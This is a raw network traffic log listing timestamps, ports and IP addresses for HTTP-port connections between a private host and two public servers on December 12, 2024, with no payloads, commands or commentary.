Dec 12, 2024 16:48:46.572969913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.573539972 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.573635101 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.573707104 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.573713064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.573719978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.574088097 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.574727058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.575017929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.575046062 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.575103998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.575763941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.575849056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.575854063 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.575939894 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.576026917 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.576029062 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.576061010 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.576752901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.577550888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.577651978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.577790976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.577797890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.577914953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.578265905 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.578272104 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.578850031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.578860998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.578963041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.579349041 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.579857111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.580634117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.580640078 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.580651999 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.580754042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.580764055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.581252098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.581837893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.581938028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.582237959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.582253933 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.582328081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.582963943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.582969904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.583024025 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.583029985 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.583076000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.583121061 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.583976984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.584268093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.584873915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.584980965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.585005999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.585357904 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.585364103 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.585458040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.585937977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.585943937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.586411953 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.586486101 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.587006092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.587011099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.587099075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.587802887 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.587807894 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.588001013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.588001966 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.588006020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.588229895 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.589020967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.589205027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.590003014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.590060949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.590066910 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.590104103 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.590106010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.590141058 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.591056108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.591104031 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.591227055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.591424942 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.591994047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.592242002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.592346907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.592612982 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.592639923 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.592762947 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.593261957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.593822956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.594115019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.594260931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.594346046 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.594898939 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.594993114 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.595036983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.595046997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.595134974 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.595135927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.596107960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.596333981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.596443892 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.597187042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.597282887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.597287893 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.597383022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.597383022 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.597383022 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.597546101 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.598226070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.598319054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.599350929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.599452019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.599487066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.599556923 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.599845886 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.599914074 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.599978924 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.600133896 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.600507975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.601012945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.601713896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.601808071 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.602731943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.602740049 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.602859974 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.602936029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.602956057 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.602957010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.603039026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.603091002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.604072094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.604497910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.604625940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.604995966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.605137110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.605142117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.605153084 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.605310917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.605314016 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.606199980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.606515884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.607089043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.607196093 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.607358932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.607578993 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.607584000 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.607637882 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.607673883 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.607986927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.608968019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.609060049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.609278917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.609366894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.609455109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.610091925 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.610311031 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.610321045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.610327005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.610425949 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.610425949 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.610426903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.611157894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.611260891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.611454964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.612246990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.612255096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.612363100 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.612375975 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.612467051 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.612468958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.613158941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.613749027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.614358902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.614366055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.614471912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.614923954 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.614929914 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.615063906 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.615705013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.615710974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.615835905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.616616964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.616632938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.616738081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.617358923 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.617480993 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.617523909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.617535114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.617623091 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.617749929 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.618470907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.618618011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.618865013 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.619435072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.619507074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.619563103 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.619609118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.619625092 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.619643927 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.619879007 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.620398045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.620487928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.620579958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.621227980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.621321917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.621552944 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.621630907 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.621650934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.621654034 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.621932030 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.622011900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.622136116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.622318029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.622565985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.622637987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.622759104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.623317957 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.623450994 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.623450994 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.623456955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.623553038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.623600006 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.623673916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.624485970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.624641895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.625394106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.625401974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.625624895 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.625791073 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.626034975 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.628087044 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.628380060 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.628427982 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.628427982 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.630462885 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.630507946 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.630634069 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.630673885 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.632874012 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.632927895 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.632940054 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.632972956 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.635235071 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.635371923 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.635441065 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.635441065 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.637561083 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.637675047 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.637810946 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.637923956 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.639986992 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.640065908 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.640070915 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.640212059 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.642235994 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.642585039 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.643091917 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.643151999 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.644654989 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.644701004 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.645000935 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.645076990 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.665966034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.714220047 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.714323044 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.714708090 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.714822054 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.715142012 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.715356112 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.715538025 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.715697050 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.717102051 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.717184067 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.717814922 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.717878103 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.718029022 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.718072891 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.719516039 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.719566107 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.719569921 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.719644070 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.721368074 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.721483946 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.721489906 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.721632957 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.723145962 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.723220110 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.723754883 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.723824978 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.724951029 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.724956989 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.725217104 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.726628065 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.726716995 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.726828098 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.727118969 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.728537083 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.728679895 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.728701115 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.728768110 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.730180979 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.730261087 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.730324984 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.730370045 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.731856108 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.731916904 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.731972933 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.731972933 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.733484030 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.733624935 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.733942986 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.734097004 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.735131025 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.735213995 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.735388041 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.735471010 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.736824036 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.737247944 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.737304926 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.737782001 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.738411903 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.738579988 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.738837957 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.740010977 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.740082979 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.740092039 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.740164042 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.741624117 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.741687059 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.741713047 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.741754055 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.743277073 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.743374109 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.743797064 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.743880987 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.744770050 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.744847059 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.745063066 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.745141029 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.746442080 CET	80	49957	185.215.113.16	192.168.2.10
